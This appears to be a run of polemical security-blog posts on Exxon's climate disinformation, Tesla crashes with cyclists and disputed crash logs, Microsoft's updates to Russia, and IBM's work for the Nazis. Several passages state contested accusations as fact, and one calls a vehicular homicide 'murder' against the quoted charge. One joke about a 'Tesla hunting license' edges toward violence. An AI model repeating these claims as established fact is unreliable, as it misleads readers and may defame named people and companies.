“We’ve dug into not just to the language, the rhetoric in these documents, but also the data. And I’d say in that sense, our analysis really seals the deal on ‘Exxon Knew,'” Supran said. It “gives us airtight evidence that Exxon Mobil accurately predicted global warming years before, then turned around and attacked the science underlying it.”
[…]
“It was clear that Exxon Mobil knew what was going on,” Wuebbles said. “The problem is at the same time they were paying people to put out misinformation. That’s the big issue.”
There’s a difference between the “hype and spin” that companies do to get you to buy a product or politicians do to get your vote and an “outright lie … misrepresenting factual information and that’s what Exxon did,” Oreskes said.
Is there really a difference? Exxon is using disinformation to get people to buy its products and put its politicians into office.
The outright lies maybe used to be different back in the WWI Propaganda Office days of Woodrow Wilson, but by the 1930s (e.g. the inexplicable rise of petroleum cars instead of electric at that time) surely it’s been the same thing.
Here’s a example from Texas of how roads become far less safe as more Tesla were introduced, necessitating expensive infrastructure upgrades to save lives.
When he reached Pierce Street, a Tesla turned the corner and drove into the bike lane. First, though, the vehicle hit the concrete barriers protecting the lane, bouncing over them, the force of the impact reduced before Fincham was hit and was thrust across the Tesla’s hood.
The crash broke Fincham’s ribs, badly bruised his body and left a permanent scar on his hand, but he made a full recovery.
“I’m walking around because of the infrastructure,” he told the editorial board recently.
That can’t be said for hundreds of other Houstonians, some of their deaths, and lives, memorialized by “ghost bikes” adorned solemnly on street corners throughout town.
I’m not exaggerating about Tesla. The company wouldn’t exist without fraud. It’s become a public nuisance.
In February of 2022 their latest “Full Self-Driving” was proven yet again to be the opposite of what was promised, soon almost crashing into a cyclist.
A video trying to highlight Tesla FSD’s safety benefits instead captures a scary near-miss with a cyclist.
You may remember a decade ago the crazy 2013 case, which now seems like ominous foreshadowing.
A 63 year-old retiree driving a new Tesla Model S last November crossed a double yellow line, drove up a hill, drove down a hill, and finally crashed into bicyclist Joshua Alper, killing him as a result. […] Jain has been charged with misdemeanor vehicular manslaughter in Alper’s death, and not a felony, because he “did not act in a reckless way” according to the report.
That driver wasn’t charged with a felony despite falling asleep at the wheel after… he claimed his Tesla had intoxicated him.
The Tesla CEO then tried to falsely cite this case as reason he created and promoted Autopilot as being safe for falling asleep, encouraging Jain-like intoxicated driving.
Source: Twitter
Think for a minute how incredibly deceitful and malicious Tesla’s CEO is — developing automation for harm while claiming it’s for safety. He claimed that one bicyclist death by a sleeping driver was his inspiration for Autopilot, which ever since has been implicated in drivers killing more and more people!
10 out of 10 “Driverless” Fatalities Were Caused by Tesla
He falsely promoted “Autopilot would have prevented cyclist killed”, despite people correctly sounding the alarm that his Autopilot was only a lane assist thus blind to cyclists sharing the lane.
Source: Twitter
That “idiot” was exactly right, Autopilot was a huge lie — intermittent lane assist is a nightmare for cyclists as I explained recently. It was truly tragic foreshadowing of the deaths ahead.
2021: Fell asleep (as instructed by the Tesla CEO) and, when approaching a curve, [Autopilot] crossed into the oncoming traffic lane and struck a pole on the opposite shoulder.
Tesla didn’t just do the opposite of what it shamelessly promoted, it did something even worse. Lately it has been proven to make drivers perform worse than if they drove other cars, not least of all because of a CEO repeatedly making false and misleading statements.
“Fred averaged 10,000 miles per year on his bike and with his wife by his side had cycled across America, Australia, Argentina, Chile, New Zealand, and a host of European countries in his retirement years,” [until a Tesla sharing the lane ran over him on a straight road].
The rider was cycling along 56th Avenue when a Tesla hit from behind.
Hit from behind? These avoidable deaths are a Tesla thing, apparently, part of their new design that removes safety features to increase car profits. A biker was killed July 7 and another on July 24 in 2022.
Michael Brooks, acting executive director of the nonprofit Center for Auto Safety, called on NHTSA to recall Tesla’s Autopilot because it is not recognizing motorcyclists, emergency vehicles or pedestrians. “It’s pretty clear to me, and it should be to a lot of Tesla owners by now, this stuff isn’t working properly and it’s not going to live up to the expectations, and it is putting innocent people in danger on the roads,” Brooks said.
Owners? Last but not least, in 2021 a surgeon used his Tesla as a weapon to murder a cyclist, spattering himself in blood:
Henkin, who turned 59 on Tuesday, told police the Model S was a loaner vehicle owned by Tesla and he was on his way to work. He said he believed he was traveling the speed limit, which he thought to be 35 or 40 mph, records say. [The posted limit was 20]. The next day, Tampa police Detective James Snell wrote up a warrant affidavit for Henkin’s arrest on a vehicular homicide charge. In an affidavit seeking a search warrant for the Tesla’s event data recorder, Snell wrote that he used a “time/distance analysis” of the video to determine the car was traveling in excess of 100 mph just prior to the crash. Data from the event recorder showed the car was moving about 83 mph a half-second before impact, records say.
…given the number of Model 3s you’re likely to see blasting down narrow side streets in the Heights these days, Tesla probably needs as many spare parts for its Houston customers as it can get.
Honestly I figured Texas would have gone that route (pun intended) with some kind of Tesla hunting license. It’s reached a point where non-gun-owning residents probably should apply for a permit to not own and operate a firearm.
On my last trip there, as I skinned a bloody buck from a successful hunting trip, I was told that we’re serving an obligation to kill deer because they’re a public nuisance.
It got me thinking that there definitely are too many Tesla, and their owners often intend harm if not just public nuisance…
So color me surprised that this state with the most guns is investing in public infrastructure instead, as if Texas wants to become a civilized society or something and protect people from Teslas.
Tesla Model 3 in 2021 crashed into a bicycle. Would stronger infrastructure have prevented injuries?
The “Moral Rating Agency” (MRA) isn’t impressed with companies driving through loopholes to profit on Russia’s invasion of Ukraine.
…Microsoft Corp… on the Moral Rating Agency’s ‘Hall of Shame’ of companies still allegedly involved in Russia, ranked according to the Agency’s “moral rating.”
Marketwatch says MRA was set up specifically to examine integrity of companies pledging to exit Russia, using a moral algorithm.
Its latest research argues Microsoft has dropped significantly from a 2022 “faint-hearted chicken” rating, now among the worst companies supporting Russian aggression.
In March, shortly after Russia launched its invasion of Ukraine, Microsoft announced the suspension of all new sales of products and services. In June the software giant said it is significantly scaling down its operations in Russia, but would fulfill its existing contractual obligations to customers in the country, according to Reuters.
To recap, Microsoft announced in September 2022 it was working with Russian officials to meet their requirements.
And soon after that Russian media thanked Microsoft for providing new software and support.
…at the end of 2022 and that as of this week, updates for at least Windows 11 could be downloaded and installed by folks in Russia. “As we shared previously, we have stopped all new product and services sales in Russia and are complying with sanctions from the EU, UK and US,” Microsoft told The Register in a statement. So, updates… are OK, then? Got it.
No new software sales. Only new software. That’s a curious loophole.
IBM’s Watson was instrumental to the Nazi Holocaust as he and his direct assistants worked with Adolf Hitler to help ensure genocide ran on IBM equipment.
IBM was so obsessive about these genocide contracts that it demanded the U.S. government ensure machines be retrieved from Germany and returned with full payment (from seized German funds) for services delivered to Hitler.
This shouldn’t be news to anyone, yet the fact that IBM could still name anything Watson is proof that it’s still news to everyone.
IBM maintained a customer site, known as the Hollerith Department, in virtually every concentration camp to sort or process punch cards and track prisoners. The codes show IBM’s numerical designation for various camps. Auschwitz was 001, Buchenwald was 002; Dachau was 003, and so on. Various prisoner types were reduced to IBM numbers, with 3 signifying homosexual, 9 for anti-social, and 12 for Gypsy. The IBM number 8 designated a Jew. Inmate death was also reduced to an IBM digit: 3 represented death by natural causes, 4 by execution, 5 by suicide, and code 6 designated “special treatment” in gas chambers. IBM engineers had to create Hollerith codes to differentiate between a Jew who had been worked to death and one who had been gassed, then print the cards, configure the machines, train the staff, and continuously maintain the fragile systems every two weeks on site in the concentration camps.
Are the “Gates” of hell what we should call Microsoft’s contractual obligations to Russia?
That should be straightforward enough for Microsoft to be investigated and held accountable… unlike IBM, which still uses the “Watson” brand after his exposed role in genocide.
Thomas Watson chose to tabulate the Nazi census, to accept Hitler’s medal, and to fight for control of Dehomag. And he made other equally indefensible choices in his years of doing a profitable business counting Jews for Hitler…
IBM’s decisions and role are indefensible.
Morality may be more complicated for Microsoft, in ways the MRA calculator above didn’t consider. Let’s suppose a software company today supplies backdoors and remote control into updates entering Russian territory.
After all, Russia itself demanded Microsoft treat the country uniquely. Request granted?
In that sense, every Russian system taking updates from Microsoft now may be totally compromised by American military intelligence. And at the same time Russian systems not taking updates from Microsoft also may be… compromised.
We’re taking about Microsoft, after all. And war. And everyone in Russia surely knows the danger of “using” Windows.
It’s complicated.
My money is on Microsoft aiding America with what it wants, by giving Russia what it doesn’t understand.
That algorithm seems beyond the MRA, obviously, but the real proof would be Microsoft pushing code that (even indirectly) stops Russia torturing abducted children, let alone prevents Russia’s wider war crimes and its constant bombing of civilians.
“It looks like it was trying to board a ferry and suddenly accelerated into the gate, basically destroying the Tesla,” said McLean. “We don’t know what caused it to happen,” said McLean, adding police are initially looking at either a mechanical issue, or a matter concerning the driver, which may have caused the sudden acceleration.
There’s a twist to the story.
There was no vessel in the berth at the time of the incident. The vehicle was not attempting to board a ferry.” […] Typically, in order for a vehicle to get to the ferry ramps it would have to have been authorized to board a ferry, so it remains unclear if the vehicle was intending to board at another ramp but ended up accelerating toward one that had no ferry.
It brings to mind the crash video from China that shows brake lights illuminated, while Tesla insisted the brakes were never used.
Tesla also claims that the driver never pressed the brakes. Pictures from public cameras show that this is not true: the brake lights are clearly on at least one occasion without any obstacles ahead…
It’s a very old problem and Tesla routinely accuses its customers of stepping on the “wrong” pedal continuously and at 100%, such as a recent case where a family drove into a pool.
The big problem with Tesla analysis, of course, is that they may simply have no integrity (especially when compared with other brands). The logs are fallible. So when you read a statement like this one, ask yourself whether the log may record what the car thought and NOT what the driver actually instructed.
Data shows that the vehicle was traveling at 6 mph when the accelerator pedal was abruptly increased to 100%. Consistent with the driver’s actions, the vehicle applied torque and accelerated as instructed.
That phrase “consistent with the driver’s actions” seems wrong. Why would someone write it that way? It gives the impression that they started with that assumption and then just looked for some sloppy way to prove it.
What if the pedal system increased to 100% in contradiction to the driver actions.
I’m not speaking hypothetically but from experience. I’ve been able to inject commands using CAN-bus into cars giving them bogus commands, even exploiting race conditions. Sending 100% accelerator signals and having it hit the logs begs whether any real proof exists of a connection to physical pedal.
You’ve heard of phantom braking. Why not phantom breaking… from unintended acceleration?
NHTSA opened a formal investigation in February 2022 regarding phantom braking incidents. The investigation includes 2021-2022 Tesla Model 3 and Model Y vehicles, and by May 2022, the government knew of more than 750 unintended sudden braking incidents.
Allegedly this is why some Tesla owners think they need a camera on the floor recording their foot positions.
A better solution would be the logs going to the owner. And then the owner regularly testing the logs and validating integrity controls.
With the brake pedal lights in the video contradicting Tesla’s overconfident statement that brakes weren’t applied (according to their logs) you see the problem. With the logs being sent always to the owner’s personal data storage and with regular integrity tests, you’d definitely see the problem.
a blog about the poetry of information security, since 1995